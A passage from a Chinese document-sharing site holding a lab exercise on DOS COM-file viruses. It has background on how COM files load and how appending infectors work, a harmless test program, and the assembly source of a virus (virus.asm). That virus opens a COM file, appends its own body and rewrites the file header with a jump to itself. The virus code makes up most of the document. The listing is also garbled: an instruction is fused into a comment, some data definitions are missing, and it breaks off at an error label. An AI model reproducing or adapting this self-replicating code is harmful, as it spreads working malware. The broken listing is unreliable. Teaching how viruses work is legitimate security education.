Com病毒实验文档

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

COM病毒实验

【实验目的】

1、掌握COM病毒的传播原理。

2、掌握MASM611编译工具的使用。

【实验平台】

1、MS-DOS 7.10

2、MASM611

【预备知识】

1、COM文件的特点

COM文件是DOS的一种二进制代码的可执行文件,COM文件结构比较简单,加载过程十分迅速。整个程序只有一个段。因此全部代码长度必须小于64K,其入口代码地址是CS:100H。DOS装入COM文件时,先在内存建立一个长度为100H的程序前缀段(PSP,由DOS建立,是DOS用户程序和命令行之间的接口),然后将整个文件装载于PSP上端,不进行重定位操作,接着将四个段地址寄存器DS(Data Segment),CS(Code Segment),SS(Stack Segment),ES(Extra Segment)初始化为程序前缀段(PSP)的段地址,最后将程序的控制权交于CS:100H处。如表一所示:

表1:COM病毒的装入和执行

2、病毒原理

COM病毒感染一般有两种途径,一种是将自身代码附加到宿主程序之前,病毒执行完后恢复寄生程序原先的状态,并用JMP FAR等指令使程序再次回到CS:100H处,以确保寄生程序与PSP的一致。但更为常见的病毒为采用保存文件头若干字节,并将第一条指令改为“JMP 病毒入口”,以确保病毒最先执行。病毒执行完后,会恢复并运行原文件,以便传播,当其将原文件参数全部恢复后,会将控制权交于CS:100H处。

【试验内容】

本实验以尾部感染COM文件的病毒为例子,其中待感染COM文件“”、病毒源文件“virus.asm”如下所示:

代码:

.model tiny

program segment

assume cs:program,ds:program,ss:program,es:program

org 0100h

main proc near

MOV DX,offset message

MOV AH,09h

INT 21h

MOV AH,4Ch

INT 21h

RET

message db 0dh,'This a simple com program for a test',0dh,0ah,'$'

program ends

END

代码virus.asm:

CSEG SEGMENT

ASSUME CS:CSEG,DS:CSEG,SS:CSEG

main PROC NEAR

mainstart:

CALL vstart ;病毒的代码开始处

vstart:

POP SI ;得到当前地址

MOV BP,SI ;保存当前地址

PUSH SI

MOV AH,9

ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串

MOV DX,SI

INT 21h

POP SI

ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节

MOV DI,100h ;目的地址

MOV AX,DS:[SI] ;开始复制

MOV DS:[DI],AX

INC SI

INC SI

INC DI ;将yuan4byte处的4个字节复制到100处

INC DI

MOV AX,DS:[SI]

MOV DS:[DI],AX

MOV SI,BP ;恢复地址值,将文件的头4个字节读入到yuan4byte处MOV DX,OFFSET delname-OFFSET vstart ;得到文件名

ADD DX,SI

INT 21h

MOV DX,OFFSET filename-OFFSET vstart ;得到文件名

ADD DX,SI

MOV AL,02

MOV AH,3dh ;写文件

INT 21h

JC error

MOV BX,AX ;文件句柄

MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节

ADD DX,SI

MOV CX,4

MOV AH,3fh

INT 21h

MOV AX,4202h ;到文件尾

XOR CX,CX

XOR DX,DX

INT 21h

MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方

ADD DI,2

ADD DI,SI

SUB AX,4

MOV DS:[DI],AX

ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒

MOV DX,SI

MOV vsizes,OFFSET vends-OFFSET mainstart

MOV CX,vsizes

MOV AH,40h

INT 21h

MOV SI,BP ;定位到文件头

MOV AL,0

XOR CX,CX

XOR DX,DX

MOV AH,42h

INT 21h

MOV AH,40h ;将新的文件头写入

MOV CX,4

MOV DX,OFFSET new4byte-OFFSET vstart

ADD DX,SI

INT 21h ;将new4byte处4个字节内容写入文件开始处,即将文件开头设置一条jmp指令,;跳转到病毒开始处

MOV AH,3eh ;关闭文件

INT 21h

error:

相关文档
最新文档